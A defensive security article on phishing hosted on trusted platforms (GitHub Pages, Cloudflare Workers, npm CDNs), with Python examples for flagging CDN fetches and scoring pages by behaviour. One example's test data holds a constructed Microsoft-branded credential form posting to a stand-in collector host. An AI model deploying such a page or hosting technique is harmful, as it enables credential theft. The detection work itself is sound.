The detection model that protected organizations for two decades assumed malicious infrastructure would look different from legitimate infrastructure. Attackers have systematically dismantled that assumption.
For years, identifying malicious infrastructure was a pattern-matching exercise that security professionals learned to perform almost instinctively. A newly registered domain, an unfamiliar hosting provider, WHOIS records that didn’t quite add up: these were the tells that built domain reputation scores and marked something as suspicious before deeper analysis even began. The signals worked because attackers had to build their own parallel ecosystem, and each step left marks. The infrastructure bore the fingerprints of its illegitimate origins.
That model assumed malicious infrastructure would always look different from legitimate infrastructure. For two decades, it did.
The phishing campaigns now flooding enterprise inboxes don’t bear any of those marks. The credential harvesting pages are hosted on GitHub Pages, the SSL certificates come from Cloudflare, and the domains have existed for years with clean reputation scores. Every signal that security teams learned to read says the infrastructure is safe, because by every traditional measure, it is. The platforms are legitimate. Only the intent is not.
What is living off trusted sites?
Security researchers have started calling this pattern “Living Off Trusted Sites,” or LOTS, a deliberate echo of the “Living Off the Land” tactics where attackers abuse legitimate system tools to evade endpoint detection. The parallel is instructive: just as PowerShell and WMI became attack vectors precisely because they’re essential to normal operations, GitHub and Cloudflare have become phishing infrastructure precisely because blocking them would break the modern enterprise.
The economics of this shift favor attackers in ways that weren’t possible a decade ago. IBM X-Force’s 2025 Threat Intelligence Index observed that cloud hosting services effectively guarantee attackers a trusted URL, domain, and IP address, giving campaigns an air of legitimacy that persists until the hosting provider detects the abuse and acts. But detection at the platform level is slow, and the platforms themselves face an impossible triage problem: GitHub hosts over 400 million repositories, and Cloudflare sits in front of a significant percentage of the entire web. Finding malicious needles in that haystack, at speed, without disrupting legitimate users, is a challenge none of them has solved.
The result is a structural advantage for attackers that incremental detection improvements cannot address. Organizations can’t blacklist these platforms without breaking their own operations, which means the infrastructure that enables modern software development has quietly become the infrastructure that enables modern fraud.
How attackers abuse trusted platforms
The campaign that Socket.dev documented in late 2024 illustrates how thoroughly attackers have internalized this logic. The phishing pages weren’t hosted on suspicious domains; they were served from cdn.jsdelivr.net, a content delivery network that mirrors the entire npm registry and appears on corporate allow-lists worldwide. Attackers had published 175 packages across nine accounts containing no functional code, packages whose only purpose was to get credential harvesting payloads distributed through infrastructure that security tools trust by default. We examine the npm ecosystem’s particular vulnerabilities in depth separately.
The approach exploits a feature, not a flaw. Services like jsDelivr and unpkg exist to give developers free, fast access to any file in any npm package, and a package published to npm becomes available at predictable CDN URLs within minutes. That same convenience makes phishing pages trivially easy to distribute at global scale, with credentials harvested through domains that appear in enterprise allow-lists.
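Because the CDN URL is derived mechanically from the package name, version and file path, a defender can invert that mapping. The following Python is an added example, not code from the original article or from Socket.dev: it maps jsDelivr and unpkg URLs seen in proxy logs back to the package and file they serve, and flags fetches that behave like page visits rather than asset loads. The log records, the placeholder package names and the Sec-Fetch-Dest-based heuristic are constructed assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Package CDNs that serve any file out of any published package. Assumption for the
# example: these two are the ones appearing in the organisation's traffic.
PACKAGE_CDN_HOSTS = {"cdn.jsdelivr.net", "unpkg.com"}

# "name[@version][/path]" where an npm name may be scoped ("@scope/name") and a
# jsDelivr GitHub reference is "user/repo".
_NPM_RE = re.compile(r"^(?P<name>@[^/@]+/[^/@]+|[^/@]+)(?:@(?P<version>[^/]+))?(?P<path>/.*)?$")
_GH_RE = re.compile(r"^(?P<name>[^/@]+/[^/@]+)(?:@(?P<version>[^/]+))?(?P<path>/.*)?$")

@dataclass
class CdnArtifact:
    host: str
    registry: str            # "npm" or "gh"
    package: str
    version: Optional[str]   # None when the URL resolves to "latest"
    path: str

def parse_cdn_url(url: str) -> Optional[CdnArtifact]:
    """Map a package-CDN URL back to the package and file it serves; None if not one."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    if host not in PACKAGE_CDN_HOSTS:
        return None
    rest = u.path.lstrip("/")
    registry, pattern = "npm", _NPM_RE
    if host == "cdn.jsdelivr.net":
        if rest.startswith("npm/"):
            rest = rest[len("npm/"):]
        elif rest.startswith("gh/"):
            registry, pattern, rest = "gh", _GH_RE, rest[len("gh/"):]
        else:
            return None   # other jsDelivr endpoints are out of scope for this example
    m = pattern.match(rest)
    if not m:
        return None
    return CdnArtifact(host, registry, m["name"], m["version"], m["path"] or "/")

def review_cdn_fetches(records: list) -> list:
    """Flag package-CDN fetches that behave like page visits instead of asset loads.

    Heuristic (an assumption of this example, not a published detection): legitimate
    use of an npm CDN is a script/style/font load referenced by some other page, so a
    top-level document navigation to a CDN URL, or an HTML file pulled from a package,
    is worth an analyst's look. 'dest' is the logged Sec-Fetch-Dest request header.
    """
    findings = []
    for rec in records:
        art = parse_cdn_url(rec["url"])
        if art is None:
            continue
        reasons = []
        if rec.get("dest") == "document":
            reasons.append("top-level navigation to a package CDN URL")
        if art.path.lower().endswith((".html", ".htm")):
            reasons.append("HTML document served out of a package")
        if reasons:
            label = f"{art.registry}:{art.package}@{art.version or 'latest'}{art.path}"
            findings.append((label, reasons))
    return findings

# Constructed proxy-log records (not real traffic; "placeholder-pkg" and the
# example-user repository are placeholders, not real packages).
SAMPLE_RECORDS = [
    {"url": "https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js", "dest": "script"},
    {"url": "https://unpkg.com/normalize.css@8.0.1/normalize.css", "dest": "style"},
    {"url": "https://cdn.jsdelivr.net/npm/placeholder-pkg@1.0.0/signin.html", "dest": "document"},
    {"url": "https://cdn.jsdelivr.net/gh/example-user/example-repo@v2/widget.js", "dest": "script"},
]

if __name__ == "__main__":
    for label, reasons in review_cdn_fetches(SAMPLE_RECORDS):
        print(label, "->", "; ".join(reasons))
```

The parsed package name and version are the useful output: they let an analyst pull the exact package from the registry and inspect what else it contains, which a bare CDN hostname in a block-list decision never surfaces.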
The pattern repeats across the ecosystem. Unit 42 found that 68% of observed phishing infrastructure now operates behind Cloudflare services. RavenMail identified over 100,000 malicious GitHub repositories hosting Microsoft 365 phishing pages. Dynamic DNS services like DuckDNS allow anyone to generate seemingly legitimate hostnames in minutes with zero investment or traceable registration. The Verizon 2025 Data Breach Investigations Report captured the downstream impact: breaches involving third-party platforms doubled from 15% to 30% in a single year, with the report noting that platforms once viewed as trusted have become points of failure.
Why trusted site phishing is harder to take down
The traditional takedown model assumed that malicious infrastructure existed in a gray zone of marginal hosting providers and bulletproof registrars, places where a well-crafted abuse report could trigger rapid removal because the provider had little incentive to protect the customer. That assumption breaks down completely when the infrastructure is GitHub or Cloudflare.
Requesting removal of a phishing page from GitHub means navigating an abuse reporting process designed to avoid false positives that could disrupt legitimate users. Cloudflare’s position as an infrastructure provider rather than a content host complicates requests to block specific pages. Each platform maintains its own procedures, response times, and evidentiary requirements, none of which were designed for credential theft at scale.
The economics compound the problem. Creating a new GitHub repository takes seconds, publishing an npm package requires only an email address, and standing up a Cloudflare Workers instance costs nothing. When infrastructure gets taken down, replacements deploy faster than abuse reports can be processed. The toll scam campaigns that Cisco Talos documented across eight U.S. states, part of Chinese criminal operations that the Wall Street Journal reported as generating over $1 billion across three years, illustrate what becomes possible when infrastructure is disposable and free. Attackers aren’t beating the takedown process; they’re operating at a tempo it was never designed to match.
Detecting phishing when domain reputation fails
The failure of reputation-based detection has been evident for years, and the solution has been discussed for nearly as long: stop evaluating infrastructure and start evaluating behavior. A page hosted on GitHub that requests Microsoft 365 credentials displays behavioral indicators regardless of its hosting location. A redirect chain that passes through multiple legitimate services before reaching a credential harvesting form reveals intent through its structure. The hosting is a red herring; the behavior is the signal.
Yet the shift remains incompletely implemented across most of the industry. CrowdStrike’s 2025 Global Threat Report found that 79% of cyberattack detections were malware-free, with attackers relying on credential abuse and identity-based intrusions rather than traditional payloads. When attacks operate through legitimate channels, using legitimate infrastructure, to harvest credentials that enable legitimate-looking access, the entire concept of a “malicious indicator” requires redefinition. Content analysis, user interaction patterns, and contextual signals need to become primary rather than supplementary, and the infrastructure question needs to become secondary to the intent question.
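To make the infrastructure-versus-behaviour distinction concrete, here is an added Python example (not code from the original article or from any vendor it cites) that evaluates the same page twice: once with a reputation-only check that returns "allow" for anything on a trusted platform or an old domain, and once on what the page does, namely a branded credential form on a domain the brand does not use, a form that posts to a third-party host, and a redirect chain that crosses several unrelated domains. The brand phrases, the trusted-platform list, the scoring threshold, and the sample page, hosts and redirect chain are all constructed assumptions of the example.

```python
from dataclasses import dataclass, field
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed for this example: phrases a Microsoft 365 sign-in page carries, and the
# registrable domains a genuine Microsoft sign-in form is expected to live on. A real
# deployment carries the organisation's own protected brands and their login hosts.
BRAND_MARKERS = ("microsoft", "office 365", "sign in to your account")
BRAND_LOGIN_DOMAINS = ("microsoftonline.com", "live.com", "microsoft.com")

# Platforms a reputation-only check treats as inherently clean.
TRUSTED_PLATFORM_SUFFIXES = ("github.io", "workers.dev", "jsdelivr.net")

def registrable_domain(host: str) -> str:
    # Simplification for the demo: the last two labels. Production code should use the
    # Public Suffix List, since e.g. "co.uk" is a suffix, not a registrable domain.
    return ".".join(host.lower().split(".")[-2:])

def reputation_verdict(url: str, domain_age_days: int) -> str:
    """The traditional check: a trusted platform or an old domain means 'allow'."""
    host = (urlparse(url).hostname or "").lower()
    on_platform = any(host == s or host.endswith("." + s) for s in TRUSTED_PLATFORM_SUFFIXES)
    return "allow" if on_platform or domain_age_days > 365 else "review"

@dataclass
class PageSignals:
    password_fields: int = 0
    form_actions: list = field(default_factory=list)
    brand_hits: list = field(default_factory=list)

class _PageScanner(HTMLParser):
    """Extract the few structural facts the behavioural check needs from page HTML."""
    def __init__(self):
        super().__init__()
        self.sig = PageSignals()
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.sig.password_fields += 1
        elif tag == "form":
            self.sig.form_actions.append(a.get("action", ""))
        if a.get("alt"):             # brand names often appear only as logo alt text
            self._text.append(a["alt"])

    def handle_data(self, data):
        self._text.append(data)

    def signals(self) -> PageSignals:
        text = " ".join(self._text).lower()
        self.sig.brand_hits = [b for b in BRAND_MARKERS if b in text]
        return self.sig

def behavior_verdict(page_url: str, html: str, redirect_chain: list) -> tuple:
    """Score what the page does, not where it lives. Returns (verdict, reasons)."""
    scanner = _PageScanner()
    scanner.feed(html)
    sig = scanner.signals()
    page_host = (urlparse(page_url).hostname or "").lower()
    reasons = []
    # 1. A branded credential form on a domain the brand does not use.
    if (sig.password_fields and sig.brand_hits
            and registrable_domain(page_host) not in BRAND_LOGIN_DOMAINS):
        reasons.append(f"'{sig.brand_hits[0]}' credential form hosted on {page_host}")
    # 2. Credentials posted to a different site than the page itself.
    for action in sig.form_actions:
        target = (urlparse(action).hostname or "").lower()
        if target and registrable_domain(target) != registrable_domain(page_host):
            reasons.append(f"form posts to third-party host {target}")
    # 3. A redirect chain that hops across several unrelated domains before the form.
    hops = {registrable_domain(urlparse(u).hostname or "") for u in redirect_chain}
    if len(hops) >= 3:
        reasons.append(f"redirect chain spans {len(hops)} unrelated domains")
    return ("suspicious" if len(reasons) >= 2 else "benign"), reasons

# Constructed sample: a lookalike sign-in page on a platform subdomain, reached through
# legitimate hops. No host below is real campaign infrastructure.
SAMPLE_URL = "https://example-user.github.io/login/"
SAMPLE_CHAIN = ["https://tracker.example/click",
                "https://cdn.jsdelivr.net/npm/placeholder-pkg@1.0.0/go.html",
                SAMPLE_URL]
SAMPLE_HTML = """<html><head><title>Sign in to your account</title></head><body>
<img alt="Microsoft" src="logo.png"><h1>Sign in to your account</h1>
<form method="post" action="https://collector.example.workers.dev/submit">
<input type="email" name="loginfmt"><input type="password" name="passwd">
<button>Next</button></form></body></html>"""

if __name__ == "__main__":
    print("reputation:", reputation_verdict(SAMPLE_URL, domain_age_days=2000))
    print("behaviour: ", behavior_verdict(SAMPLE_URL, SAMPLE_HTML, SAMPLE_CHAIN))
```

The two verdicts disagree on purpose: the reputation check sees only a github.io host and says "allow", while the behavioural check sees a Microsoft-branded password form on a domain Microsoft does not use, posting to a workers.dev host, at the end of a three-domain redirect chain. The same code returns "benign" for a genuine sign-in page on its own domain, which is the distinction the reputation check cannot make.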
The organizations that have made this shift aren’t defending against LOTS attacks with better blocklists. They’re defending with systems that understand what the attacker is trying to accomplish, regardless of where they’re trying to accomplish it from.
The Bottom Line
The mental model that treated domain reputation as a primary defense has been systematically dismantled by attackers who recognized what it was actually measuring. Phishing infrastructure now operates from platforms that security tools trust by default, which means traditional indicators have become effectively useless for a growing majority of campaigns.
Organizations still relying primarily on reputation-based detection are defending against an attack model that sophisticated threat actors abandoned years ago. The infrastructure is legitimate. The intent is not. Detection strategies that can’t distinguish between the two aren’t detection strategies anymore.
Key Takeaways
Living Off Trusted Sites describes phishing campaigns that operate from legitimate platforms like GitHub Pages, Cloudflare Workers, and npm CDNs rather than dedicated malicious infrastructure. The approach exploits the trust that security tools place in established platforms, rendering traditional detection signals structurally ineffective rather than merely outdated.
Traditional detection relies on domain reputation, WHOIS data, IP classification, and certificate age to identify malicious infrastructure. When attackers operate from github.io or workers.dev, all these signals indicate legitimate activity because the underlying infrastructure genuinely is legitimate. Organizations cannot block these platforms without disrupting their own operations.
Unit 42 found that 68% of observed phishing infrastructure operates behind Cloudflare services. RavenMail documented over 100,000 malicious GitHub repositories hosting Microsoft 365 phishing pages. Socket.dev identified 175 npm packages designed specifically to serve phishing content through legitimate CDNs. Verizon’s DBIR found that breaches involving third-party platforms doubled to 30% in a single year.
Each platform has different abuse reporting procedures, evidentiary requirements, and response times, none of which were designed for credential theft at scale. The economics are asymmetric: creating replacement infrastructure takes seconds and costs nothing, while takedown processes take hours or days. Attackers operate at a tempo the takedown process cannot match.
Detection must shift from evaluating infrastructure characteristics to analyzing behavior and content. A page requesting Microsoft 365 credentials displays behavioral indicators regardless of where it’s hosted. Content analysis, interaction patterns, and contextual signals become the primary defense layer when reputation signals have been neutralized.